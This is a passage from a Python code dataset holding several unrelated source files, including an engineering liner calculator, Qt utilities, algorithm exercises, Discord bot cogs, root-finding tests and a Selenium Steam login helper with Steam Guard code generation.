self.vardict['ov_red_fact']\n        mod = self.vardict['lng_term_modulus']\n\n        # Calculate\n        adjusted_gwhead = gwhead - (dia/12)\n        Rw_calc = 1.0-(0.33*(adjusted_gwhead/depth))\n        Rw_min = 0.67\n        Rw_max = 1.0\n        Rw = max(Rw_calc, Rw_min) # floor at 0.67; min() here would wrongly cap the factor at its minimum\n        Rw = Rw_max if Rw > Rw_max else Rw #Water buoyancy factor\n        Qt = ((0.433*adjusted_gwhead)+((W*depth*Rw)/144)\n              +self.live_load_determination())\n        B_prime = 1/(1+(4*(exp(-0.065*depth)))) #Coef of elastic 
support\n mom_inert = ((dia**3)*((FS*Qt)**2))/(32*Rw*B_prime*smod*oval*mod)\n liner_thickness_x1p2p2 = (12*mom_inert)**(1/3)\n return liner_thickness_x1p2p2\n\n def x1p2p2p1(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n des_mod = self.vardict['design_modulus']\n \n # Calculate\n mom_inert_min = (0.093*(dia**3))/des_mod\n liner_thickness_x1p2p2p1 = (12.0*mom_inert_min)**(1/3)\n return liner_thickness_x1p2p2p1 \n \n def thickness_formater(self): #formatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n thickness = self.thickness_calc()\n \n # Format\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n liner_thickness = 'No hydraulic loading, design as fully deteriorated or use minimum thickness.'\n else:\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = str('{0:.2f}'.format(thickness*25.4)) + 'mm'\n else:\n liner_thickness = 'error'\n \n return liner_thickness\n \n def thickness_calc(self): #unformatted\n # Pull variables from dictionary\n condition = self.vardict['design_condition']\n gwload = self.vardict['gw_load']\n\n # Calculate\n if (condition == 'Partially Deteriorated'):\n if gwload <= 0:\n liner_thickness = 0\n else:\n liner_thickness = max(self.x1p1(), self.x1p2(), self.x1p2p1p1()) #output is in inches\n elif (condition == 'Fully Deteriorated'):\n liner_thickness = max(self.x1p2p2(), self.x1p2p2p1()) #output is in inches\n\n return liner_thickness\n \n def flow_change(self):\n # Pull variables from dictionary\n dia = self.vardict['host_diameter']\n liner_t = self.thickness_calc()\n n_host = self.vardict['n_host']\n n_liner = self.vardict['n_liner']\n gwload = self.vardict['gw_load']\n condition = self.vardict['design_condition']\n \n #Calculate\n coeff = 0.608173 #For flow at pipe 2/3 full (design flow level)\n r_host = dia/2\n r_lined = (dia/2)-liner_t\n # First check if liner thickness reduces diameter to zero\n if r_lined <= 0:\n return -100\n else:\n if (condition == 'Partially Deteriorated'):\n if (gwload <= 0):\n deltaQ_pct = 0.0\n return deltaQ_pct\n else:\n A_host = ((pi*r_host**2)*coeff)+(r_host/3)*((((r_host)**2)-((r_host/3)**2))**(0.5))\n pw_host = (2*pi*r_host)*coeff\n A_lined = ((pi*r_lined**2)*coeff)+(r_lined/3)*((((r_lined)**2)-((r_lined/3)**2))**(0.5))\n pw_lined = (2*pi*r_lined)*coeff\n slope = 0.102\n hyd_rad_host = A_host/pw_host\n hyd_rad_lined = A_lined/pw_lined\n q_host = (1.486/n_host)*A_host*(hyd_rad_host**(2/3))*(slope**(1/2))\n q_lined = (1.486/n_liner)*A_lined*(hyd_rad_lined**(2/3))*(slope**(1/2))\n deltaQ = q_lined - q_host\n deltaQ_pct = round((deltaQ/q_host) * 100)\n return deltaQ_pct\n \n def output_dict(self):\n # Convert input variables to nice format\n round_down_to0 = [\n 'design_modulus', 'design_flexural_strength', 'ret_factor',\n 'soil_density', 'soil_mod', 'host_age', 'host_diameter'\n ]\n round_down_to1 = [\n 'safety_factor', 'ovality', 'enhancement_factor', 'gw_level'\n ]\n round_down_to2 = ['poissons']\n round_down_to3 = ['n_host', 'n_liner']\n \n for i in round_down_to0:\n self.vardict[i] = round(self.vardict[i])\n for i in round_down_to1:\n self.vardict[i] = str('{0:.1f}'.format(round(self.vardict[i],1)))\n for i in round_down_to2:\n self.vardict[i] = str('{0:.2f}'.format(round(self.vardict[i],2)))\n for i in round_down_to3:\n self.vardict[i] = str('{0:.3f}'.format(round(self.vardict[i],3)))\n \n # Future - send out for calculations of flow 
reduction, add to dict\n \n return self.vardict\n\n \n\ndef LM_run(input):\n lm = LinerManager(input)\n thickness = lm.thickness_formater()\n flow_change = lm.flow_change()\n output_dict = lm.output_dict()\n return(thickness, flow_change, output_dict)\n\n\n","sub_path":"cippcalc.py","file_name":"cippcalc.py","file_ext":"py","file_size_in_byte":13351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
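`LM_run` at the bottom of cippcalc.py takes a flat dict and returns (formatted thickness, flow change %, echo of the inputs). A plausible invocation sketched from the keys the class actually reads; the numbers are illustrative only, not a worked ASTM F1216 design:

```python
# Illustrative input; blank strings fall back to the defaults in __init__.
from cippcalc import LM_run

design_input = {
    "design_condition": "Partially Deteriorated",
    "location": "Highway",        # only consulted for fully deteriorated designs
    "host_diameter": 12.0,        # inches
    "surface_to_invert": 10.0,    # feet
    "gw_level": 4.0,              # feet below surface
    "design_modulus": "", "design_flexural_strength": "", "safety_factor": "",
    "ret_factor": "", "ovality": "", "poissons": "", "soil_density": "",
    "n_host": "", "n_liner": "", "host_age": "",
}

thickness, flow_change, details = LM_run(design_input)
print(thickness)    # e.g. a "7.62mm"-style string from thickness_formater()
print(flow_change)  # percent change in 2/3-full capacity after lining
```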
+{"seq_id":"55438545","text":"### some qt utils\n\n#from PyQt5 import QtCore\n#from PyQt5.QtCore import QThread, QDateTime\nfrom PyQt5.QtCore import *\n\ndef mygettid():\n ### simple gettid like C's syscall(__NR_gettid)\n import ctypes\n import platform\n\n syscalls = {\n 'i386': 224, # unistd_32.h: #define __NR_gettid 224\n 'x86_64': 186, # unistd_64.h: #define __NR_gettid 186\n }\n libcs = {\n 'i386': '/lib/libc.so.6',\n 'x86_64': '/lib64/libc.so.6',\n }\n # libc = ctypes.CDLL(\"/lib/libc.so.6\")\n libc = ctypes.CDLL(libcs[platform.machine()])\n # tid = ctypes.CDLL('libc.so.6').syscall(224)\n return libc.syscall(syscalls[platform.machine()])\n\n### in msgh: 0 aaaaaaaaa\ndef qt_debug_handler(tp, ctx, msg):\n #print(\"in msgh:\", tp, ctx, msg)\n #print(ctx.function, ctx.file, ctx.line)\n\n tid = QThread.currentThreadId() ### voidstr type\n tid = mygettid()\n tid = str(tid).encode('utf8')\n \n now = QDateTime.currentDateTime()\n tmstr = now.toString(\"yyyy-MM-dd hh:mm:ss\")\n tmstr = tmstr.encode('utf8')\n\n fn = b''\n try:\n if ctx.file is None: # for qt internal msg\n fn = b'qtinternal'\n else:\n fn = ctx.file.encode('utf-8')\n fnl = ctx.file.split('/')\n fn = fnl[len(fnl)-1].encode('utf8')\n except:\n fn = b'errfh'\n\n line = str(ctx.line).encode('utf8')\n function = b''\n try:\n if type(ctx.function) == str:\n function = ctx.function.encode('utf8')\n elif type(ctx.function) == bytes:\n # function = ctx.function.decode('utf8')\n function = ctx.function\n else: function = str(ctx.function).encode('utf8')\n except Exception as ex:\n # print(b'EEE:' + bytes(ctx.function, 'utf8'))\n print('EEE: ctx.function: %s' % str(ctx))\n\n if function == b'': function = b'qtinternal'\n # if ctx.function == None: function = b'qtinternal' # maybe UnicodeDecodeError:\n \n flog = b\"[\" + tmstr + b\"] T(\" + tid + b\") \" + fn + b\":\" + line + b\" \" + function \\\n + b\" -- \" + msg.encode('utf8')\n print(flog.decode('utf8'), flush=True)\n\n#usage\n# qInstallMessageHandler(qt_debug_handler)\n# qDebug('奇点'.encode()), but not qDebug('奇点')\n\n\n###\n### TODO improve qDebug() function\n### 多参数类型的qDebug\n### 并且能够用上qt的 debug handler\n### 不过这样不能正确获取调用栈信息了,还是不能用啊。\ndef qxDebug(*args):\n s = ''\n for arg in args:\n s += str(arg) + ' '\n qDebug(s)\n\n#####\nimport sys, time\nimport signal\n# from PyQt5.QtWidgets import qApp\nfrom PyQt5.QtCore import QCoreApplication\n\n### 必须与qt的timeout同时才能生效。\ndef sigint_handler(a0, a1):\n qApp = QCoreApplication.instance()\n print(\"SIGINT catched:\", a0, a1, qApp)\n qApp.quit()\n sys.exit(0)\n\ndef pytimeout():\n time.sleep(0.0000001)\n\nctrl_timer = None\ndef pyctrl():\n qInstallMessageHandler(qt_debug_handler)\n qApp = QCoreApplication.instance()\n ctrl_timer = QTimer(qApp)\n ctrl_timer.timeout.connect(pytimeout)\n ctrl_timer.start(100)\n \n signal.signal(signal.SIGINT, sigint_handler)\n \n","sub_path":"wxagent/qtutil.py","file_name":"qtutil.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"88735956","text":"\"\"\"\nYou have a total of n coins that you want to form in a staircase shape, where every k-th row must have exactly k coins.\n\nGiven n, find the total number of full staircase rows that can be formed.\n\nn is a non-negative integer and fits within the range of a 32-bit signed integer.\n\nExample 1:\n\nn = 5\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤\n\nBecause the 3rd row is incomplete, we return 2.\nExample 2:\n\nn = 8\n\nThe coins can form the following rows:\n¤\n¤ ¤\n¤ ¤ ¤\n¤ ¤\n\nBecause the 4th row is incomplete, we return 3.\n\"\"\"\n\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n row = 1\n while True:\n if row*(row+1) > 2*n:\n return row - 1\n else:\n row += 1\n \n# top solution O(1)\n# 1 + 2 + 3 + 4 + 5 + 6 + 7 + ... + x <= n\n# (x * ( x + 1)) / 2 <= n`\n# a = 1, b = 1, c = -2*n\n# x = (-1 + sqrt(1 - 4*1*(-2*n))) / 2\n# simplify: x = (-1 + sqrt(1 + 8.0*n)) / 2 \nimport math\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n return int((-1 + math.sqrt(1 + 8*n)) // 2) \n \n# top solution \n# binary search O(logn)\nclass Solution(object):\n def arrangeCoins(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n start, end= 0, n\n while start <= end:\n mid = start + (end - start) // 2\n if mid * (mid + 1) <= 2* n:\n start = mid + 1\n else:\n end = mid - 1\n return int(start - 1)","sub_path":"math/441.ArrangingCoins.py","file_name":"441.ArrangingCoins.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"48871130","text":"a=input(\"Enter:\")\n\nif a=='Hello':\n print('1 -google_kz.txt 2-google_paris.txt 3-google_uar.txt')\n b=int(input())\nif b==1:\n myfile1 = open('google_kz.txt','w')\n print(\"Name of a file is: \",myfile1.name)\n myfile1.write(input())\n print(myfile1)\n myfile1.close()\nelif b==2:\n myfile2=open('google_paris','w')\n print(\"Name of a file is: \",myfile2.name)\n myfile2.write(input())\n print(myfile2)\n myfile2.close()\nelif b==3:\n myfile3=open('google-uar', 'w')\n print(\"Name of a file is: \",myfile3.name)\n myfile3.write(input())\n print(myfile3)\nmyfile3.close()","sub_path":"part2_task17.py","file_name":"part2_task17.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"259204877","text":"\"\"\"Module which contains the information required about the aircraft\"\"\"\n\naircraft_data = {\n \"air_conditions_and_anti_icing_coefficient\": 1.0,\n \"brake_material\": \"composites\", # (composites, metal)\n \"capture_area_per_inlet\": 1.0,\n \"duct_material_factor\": 1.0,\n \"duct_shape_factor\": 1.0,\n \"duct_type\": 1.0,\n \"energy_absorption_required\": 1.0,\n \"engine_control_engine_type_coefficient\": 1.0,\n \"engine_weight\": 1.0,\n \"engine_type\": \"turbojet\", # (turbofan, turbojet, turboprop, reciprocating)\n \"fuel_system_type\": \"both\", # (self, non, both)\n \"fuselage_length\": 1.0,\n \"htp_total_planform_area\": 1.0,\n \"htp_thickness_at_root\": 1.0,\n \"htp_span\": 1.0,\n \"inlet_factor\": 1.0,\n \"instruments\": 1.0,\n \"is_dump_and_drain\": True,\n \"is_engine_wing_or_body_mounted\": \"wing\",\n \"is_full_round_spike_intake\": False,\n \"is_gravity_control\": True,\n \"is_half_spike_intake\": False,\n \"is_in_flight_refuel\": False,\n \"is_internal_engines\": False,\n \"is_turbofan\": False,\n \"is_turbojet\": True,\n \"is_variable_engine_intake\": False,\n \"leading_edge_sweep\": 1.0,\n \"maximum_dynamic_pressure\": 1.0,\n \"maximum_fuselage_height\": 1.0,\n \"maximum_sea_level_mach_number\": 1.0,\n \"maximum_thickness_ratio\": 1.0,\n \"maximum_static_pressure_at_engine_compressor_face\": 1.0,\n \"number_of_attendants\": 1.0,\n \"number_of_crew\": 1.0,\n \"number_of_crew_bunks\": 1.0,\n \"number_of_engines\": 1.0,\n \"number_of_flight_deck_stations\": 1.0,\n \"number_of_inlets\": 1.0,\n \"number_of_passengers\": 1.0,\n \"number_of_pilots\": 1.0,\n \"preload_provision\": 1.0,\n \"pressurized_volume\": 1.0,\n \"ramp_length_forward_of_throat_per_inlet\": 1.0,\n \"ratio_of_htp_height_to_vtp_height\": 1.0,\n \"rudder_area\": 1.0,\n \"sandwich_ratio\": 1.0,\n \"starter_type\": \"electrical\", # (electrical, pneumatic, cartridge) - value dependent on engine type, see docs\n \"subsonic_duct_length_per_inlet\": 1.0,\n \"surface_control_coefficient\": 1.0,\n \"sweep_at_half_chord\": 1.0,\n \"tail_moment_arm\": 1.0,\n \"takeoff_weight\": 1.0,\n \"taper_ratio\": 1.0,\n \"temperature_correction_factor\": 1.0,\n \"thickness_of_htp_root\": 1.0,\n \"toilet_ratio\": 1.0,\n \"total_fuselage_fuel\": 1.0,\n \"total_surface_control_area\": 1.0,\n \"total_wing_fuel\": 1.0,\n \"ultimate_cabin_pressure\": 1.0,\n \"ultimate_load_factor\": 1.0,\n \"vtp_area\": 1.0,\n \"vtp_aspect_ratio\": 1.0,\n \"vtp_quarter_chord_sweep\": 1.0,\n \"vtp_taper_ratio\": 1.0,\n \"weight_of_electronics_system\": 1.0,\n \"weight_of_engine\": 1.0,\n \"weight_of_fuel_system\": 1.0,\n \"wing_area\": 1.0,\n \"wing_aspect_ratio\": 1.0,\n \"wing_mac\": 1.0,\n \"wing_span\": 1.0,\n \"wing_variable_sweep_structural_factor\": 1.0\n}\n","sub_path":"performance/mass_estimation/old/nicolai/aircraft_info.py","file_name":"aircraft_info.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"543499561","text":"# Put here for ease of use with statcord\nfrom discord.ext import commands\nfrom bot_config import OWNER_ID\nimport statcord\nimport os\nimport dbl\nfrom pprint import pprint\n\n\nSTATCORD_TOKEN = os.getenv(\"STATCORD_TOKEN\")\nTOP_TOKEN = os.getenv(\"TOP_TOKEN\")\nTOP_AUTH = os.getenv(\"TOP_HOOK_AUTH\")\n\n\nclass StatcordPost(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.key = STATCORD_TOKEN\n self.api = statcord.Client(self.bot, self.key)\n self.api.start_loop()\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n if str(ctx.message.author.id) == str(OWNER_ID):\n return\n self.api.command_run(ctx)\n\n\nclass TopGG(commands.Cog):\n \"\"\"Handles interactions with the top.gg API\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.token = TOP_TOKEN\n self.dblpy = dbl.DBLClient(\n self.bot, self.token, autopost=True,\n )\n # Autopost will post your guild count every 30 minutes\n\n async def on_guild_post():\n print(\"Posted to top.gg\")\n\n\ndef setup(bot):\n bot.add_cog(StatcordPost(bot))\n bot.add_cog(TopGG(bot))\n","sub_path":"cogs/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"313453620","text":"#!/usr/bin/env python3\n\nimport math\nfrom scipy import optimize\nfrom sympy.abc import x\nfrom sympy import diff\nfrom sympy import lambdify\n\nfrom numerico.raizes.bisseccao import bisseccao\nfrom numerico.raizes.falsaposicao import falsaposicao\nfrom numerico.raizes.pontofixo import pontofixo1\nfrom numerico.raizes.pontofixo import pontofixo2\nfrom numerico.raizes.newtonraphson import newtonraphson\nfrom numerico.raizes.secante import secante\n\neps = 1e-15\n\n\ndef f1(x):\n \"\"\"x * log(x) - 1\"\"\"\n return x * math.log(x) - 1\n\n\ndef f2(x):\n \"\"\"x**3 - 9*x + 3\"\"\"\n return x**3 - 9 * x + 3\n\n\ndef phi(x):\n \"\"\"x**3/9 + 1/3\"\"\"\n return x**3 / 9 + 1 / 3\n\n\ndef f3(x):\n \"\"\"sin(x)\"\"\"\n return math.sin(x)\n\n\ndef main():\n print('\\n', f1.__doc__)\n f1raiz1 = bisseccao(f1, intervalo=[1, 10])\n f1raiz2 = falsaposicao(f1, intervalo=[1, 10])\n f1raiz4 = pontofixo2(f1, x0=2.6)\n # This calculates the f1'\n f1_ = lambdify(x, diff(f1.__doc__))\n f1raiz6 = newtonraphson(f1, f1_, 2.6)\n\n f1raiz7 = secante(f1, 1, 10)\n\n print(\"Bisseccao\", f1raiz1, f1(f1raiz1))\n print(\"FalsPosic\", f1raiz2, f1(f1raiz2))\n print(\"PontoFix2\", f1raiz4)\n print(\"NewtonRap\", f1raiz6, f1(f1raiz6))\n print(\"Secante \", f1raiz7, f1(f1raiz7))\n\n print('\\n', f2.__doc__)\n f2raiz1 = bisseccao(f2, intervalo=[-1, 1])\n f2raiz2 = falsaposicao(f2, intervalo=[-1, 1])\n f2raiz3 = pontofixo1(f2, phi, x0=0.3)\n f2raiz4 = pontofixo2(f2, x0=0.3)\n\n # This calculates the f2'\n f2_ = lambdify(x, diff(f2.__doc__))\n\n f2raiz6 = newtonraphson(f2, f2_, 0.3)\n f2raiz7 = secante(f2, -1, 1)\n print(\"Bisseccao\", f2raiz1, f2(f2raiz1))\n print(\"FalsPosic\", f2raiz2, f2(f2raiz2))\n print(\"PontoFix1\", f2raiz3, f2(f2raiz3))\n print(\"PontoFix2\", f2raiz4, f2(f2raiz4))\n print(\"SCIPYMPF \", f2raiz5, f2(f2raiz5))\n print(\"NewtonRap\", f2raiz6, f2(f2raiz6))\n print(\"Secante \", f2raiz7, f2(f2raiz7))\n\n print('\\n', f3.__doc__)\n f3raiz1 = bisseccao(f3, intervalo=[-1, 1], tol=eps)\n f3raiz2 = falsaposicao(f3, intervalo=[-1, 1], xtol=eps, ytol=eps)\n f3raiz4 = pontofixo2(f3, x0=0.1, tol=eps, maxiter=500)\n\n # This calculates the f3'\n f3_ = lambdify(x, diff(f3.__doc__))\n f3raiz6 = newtonraphson(f3, f3_, 0.5)\n f3raiz7 = secante(f3, -1, 1)\n\n print(\"Bisseccao\", f3raiz1, f3(f3raiz1))\n print(\"FalsPosic\", f3raiz2, f3(f3raiz2))\n print(\"PontoFix2\", f3raiz4, f3(f3raiz4))\n print(\"NewtonRap\", f3raiz6, f3(f3raiz6))\n print(\"Secante \", f3raiz7, f3(f3raiz7))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"numerico/raiz/testes/raizes.py","file_name":"raizes.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"433476908","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n#\n# @AUTHOR: Rabbir\n# @FILE: \\rab_python_packages\\rab_steam.py\n# @DATE: 2021/02/03 Wed\n# @TIME: 17:18:46\n#\n# @DESCRIPTION: 共通 Steam 模块(操作基本基于 Selenium)\n\n\nimport hmac\nimport time\nimport base64\nimport struct\nimport selenium\nfrom hashlib import sha1\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom rab_python_packages import rab_logging\n\n\n# 日志记录\nrab_steam_logger = rab_logging.build_rab_logger()\n\n\n\"\"\"\n@description: r_steam 类\n-------\n@param:\n-------\n@return:\n\"\"\"\nclass r_steam:\n\n \"\"\"\n @description: 初始化\n -------\n @param:\n -------\n @return:\n \"\"\"\n def __init__(self, driver, username, password, token_flg=False, \\\n shared_secret=None, identity_secret=None):\n self.driver = driver\n self.username = username\n self.password = password\n # 令牌标识\n self.token_flg = token_flg\n # 令牌分享码\n self.shared_secret = shared_secret\n self.identity_secret = identity_secret\n\n \"\"\"\n @description: 切换至 Steam 登录窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_steam_login_window(self, exclude_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 判断不包含排除字段但是包含 STEAM 字段的窗口即为 STEAM 登录窗口\n if (exclude_field.lower() not in str(self.driver.title).lower()\n and \"steam\" in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n \n \"\"\"\n @description: 切换回原窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def switch_to_origin_window(self, fill_field):\n success_flg = False\n for window_handle in self.driver.window_handles:\n self.driver.switch_to.window(window_handle)\n # 包含满足要求字段的窗口即为原窗口\n if (fill_field.lower() in str(self.driver.title).lower()):\n success_flg = True\n break\n else:\n continue\n return success_flg\n\n \"\"\"\n @description: 生成 STEAM 登录一次性令牌\n -------\n @param:\n -------\n @return:\n \"\"\"\n def generate_one_time_code(self):\n timestamp = int(time.time())\n time_buffer = struct.pack(\">Q\", timestamp//30)\n time_hmac = hmac.new(base64.b64decode(self.shared_secret),\n time_buffer,\n digestmod=sha1).digest()\n begin = ord(time_hmac[19:20]) & 0xf\n full_code = struct.unpack(\">I\",\n time_hmac[begin:begin+4])[0] & 0x7fffffff\n chars = \"23456789BCDFGHJKMNPQRTVWXY\"\n code = \"\"\n for j in range(5):\n full_code, i = divmod(full_code, len(chars))\n code += chars[i]\n return code\n\n \"\"\"\n @description: 在 STEAM 登录界面实现登录\n -------\n @param:\n -------\n @return:\n \"\"\"\n def do_steam_login(self):\n try:\n # 等待登录按钮出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='imageLogin']\")))\n # 检查是否已经登录\n try:\n time.sleep(1)\n # 如果有当前账户名说明已经登录完成了\n account_div = self.driver.find_element_by_class_name(\n \"OpenID_loggedInAccount\")\n logined_flg = True\n except Exception as e:\n logined_flg = False\n # 登录的情况下进行登出操作\n if (logined_flg):\n print(\"Steam 当前已经处于登录状态,尝试登出...\")\n # 选择登出这个账号\n logout_div_a = self.driver.find_element_by_xpath(\n \"//div[@class='OpenID_Logout']/a\")\n logout_div_a.click()\n # STEAM 用户名输入框\n steam_account_name_input = self.driver \\\n .find_element_by_id(\"steamAccountName\")\n # STEAM 密码输入框\n steam_password_input = self.driver \\\n .find_element_by_id(\"steamPassword\")\n # 输入用户名和密码\n 
steam_account_name_input.send_keys(self.username)\n steam_password_input.send_keys(self.password)\n # 点击登录按钮\n self.driver.find_element_by_id(\"imageLogin\").click()\n # 无令牌的情况下或者当前已经是登录状态就算登录成功\n if (not self.token_flg):\n return True\n else:\n # 等待需要令牌的弹窗出现\n element = WebDriverWait(self.driver, 30, 0.1).until(\n EC.presence_of_element_located((By.XPATH,\n \"//input[@id='twofactorcode_entry']\")))\n twofactorcode_entry_input = self.driver.find_element_by_id(\n \"twofactorcode_entry\")\n # 等待三秒弹窗可见后,生成并输入令牌\n time.sleep(3)\n twofactorcode_entry_input.send_keys(\n self.generate_one_time_code())\n # 提交按钮\n submit_btn = self.driver.find_element_by_xpath(\n \"//div[@id='login_twofactorauth_buttonset_entercode']/div\")\n submit_btn.click()\n return True\n except Exception as e:\n # 登录失败\n rab_steam_logger.error(\"Steam 登录界面操作出错!错误信息:\" + str(e))\n return False\n\n \"\"\"\n @description: 等待 Steam 登录成功并自动关闭窗口\n -------\n @param:\n -------\n @return:\n \"\"\"\n def wait_steam_login_success(self, fill_field):\n for i in range(0, 10):\n if (len(self.driver.window_handles) == 1\n and fill_field.lower() in str(self.driver.title).lower()):\n return True\n else:\n time.sleep(2)\n continue\n return False\n\n\n\"\"\"\n@description: 单体测试\n-------\n@param:\n-------\n@return:\n\"\"\"\nif __name__ == \"__main__\":\n print(\"todo...\")\n","sub_path":"rab_steam.py","file_name":"rab_steam.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
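`generate_one_time_code` in the record above is a TOTP variant: HMAC-SHA1 over the 30-second counter, a 4-byte dynamic truncation, then base-26 encoding into Steam's alphabet. A standalone Python 3 version for experimenting without the Selenium wrapper; the shared secret below is a dummy value:

```python
# Same algorithm as r_steam.generate_one_time_code, free of the class.
import base64
import hmac
import struct
import time
from hashlib import sha1

def steam_guard_code(shared_secret, timestamp=None):
    if timestamp is None:
        timestamp = int(time.time())
    counter = struct.pack(">Q", timestamp // 30)           # 30-second time step
    digest = hmac.new(base64.b64decode(shared_secret), counter, sha1).digest()
    begin = digest[19] & 0xF                               # dynamic truncation offset
    code_int = struct.unpack(">I", digest[begin:begin + 4])[0] & 0x7FFFFFFF
    chars = "23456789BCDFGHJKMNPQRTVWXY"
    code = ""
    for _ in range(5):
        code_int, idx = divmod(code_int, len(chars))
        code += chars[idx]
    return code

# Dummy secret (base64 of 20 zero bytes) purely to exercise the function.
print(steam_guard_code(base64.b64encode(b"\x00" * 20).decode()))
```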
+{"seq_id":"20098691","text":"import inspect\nimport contextlib\nimport io\n\n\ndef write_stat(name, content):\n \"\"\"\n Utility function to pretty-print multi-line information in the following form:\n [Name]: [line 1]\n [line 2]\n ...\n :param name: Name of the stat\n :param content: The potentially multi-line information to be printed\n \"\"\"\n content = content.replace(\"\\n\", \"\\n\\t\")\n print(f\"{name}:\\t{content}\")\n\n\ndef reflect(func):\n \"\"\"\n Quine is a program which takes no input but outputs a copy of its own code.\n So function reflect is not a quine, because:\n 1. It takes function as input.\n 2. Its output depends on a given function rather than producing it by itself.\n\n Decorator that show certain stats and the source code on the wrapped function.\n :param func: Function to be wrapped\n \"\"\"\n\n def wrapper(*args, **kwargs):\n stdout_redir = io.StringIO()\n with contextlib.redirect_stdout(stdout_redir):\n func(*args, **kwargs)\n\n output = stdout_redir.getvalue()\n source = inspect.getsource(func)\n\n sourcelines, _ = inspect.getsourcelines(func)\n \n # Output\n write_stat(\"Name\", func.__name__)\n write_stat(\"Type\", str(type(func)))\n write_stat(\"Sign\", str(inspect.signature(func)))\n print()\n write_stat(\"Args\", f\"positional {args}\\nkey=worded {kwargs}\")\n print()\n write_stat(\"Doc\", str(inspect.getdoc(func)))\n print()\n write_stat(\"Source\", source)\n # For some reason, inspect.getsource adds a newline at the end of the function,\n # thus no print() here\n write_stat(\"Output\", output)\n print()\n\n return wrapper\n","sub_path":"Assignment3/3/reflect.py","file_name":"reflect.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"326896499","text":"import random\nimport math\nimport os\nimport re\nimport sys\n\nimport dijkstras\n\nfrom router import RouteInfos\n\nsys.path.append('../')\n\n# ////////////////////////////// OPTIONS \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ #\n# Router ids must be sequential, starting from 1, skipping no numbers.\nundir_adj_list = \"\"\"\n1:2\n\"\"\"\n\nexample_num = \"10\"\nupdate_period = \"5\"\nmin_cost = 1\nmax_cost = 1\n\n# Used to weight costs.\naverage_cost = None # Can be set to None to have no weighting in the range (min_cost, max_cost)\n# \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ OPTIONS ////////////////////////////// #\n\n# Build the costs list, containing the costs that routers will randomly choose from, if costs arent defined in adj list.\nif average_cost:\n cost_range = max_cost - min_cost + 1\n costs = []\n # Decent guess at costs with given average.\n for i in range(min_cost, max_cost + 1):\n try:\n amount = round(cost_range / (abs(i - average_cost)))\n except ZeroDivisionError:\n amount = cost_range * 5\n costs += [i] * amount\n # Brute force until the average of the costs is far better.\n while True:\n costs_average = sum(costs)/len(costs)\n difference = costs_average - average_cost\n if abs(difference) < 0.0001:\n break\n if difference > 0:\n costs.append(random.randint(min_cost, math.floor(average_cost)))\n else:\n costs.append(random.randint(math.ceil(average_cost), max_cost))\nelse:\n costs = [i for i in range(min_cost, max_cost + 1)]\n\n\n# Check given undirected adjacency list\nrouter_ids = set(\n map(\n int,\n [item for item in map(str.strip, re.split(\"[:,]|(?:\\n|\\r\\n|\\r)\", undir_adj_list.strip())) if item.isdigit()]\n )\n)\nexpected_router_ids = set(range(1, int(max(router_ids)) + 1))\nif router_ids != expected_router_ids:\n print(\"Malformed adjacency list given.\")\n print(\"The following router ids were skipped:\", expected_router_ids - router_ids)\n exit()\n\n\nclass Edge(frozenset):\n def __new__(cls, *args):\n return super().__new__(cls, args)\n\n def __str__(self):\n return str(set(map(str, self)))\n\n def __repr__(self):\n return str(set(map(str, self)))\n\n\n# Warn if example configuration already exists.\nconfig_path = \"../configurations/example-\" + example_num + \"/\"\nif os.path.isdir(config_path):\n confirm = input(\n \"Example {} already exists. 
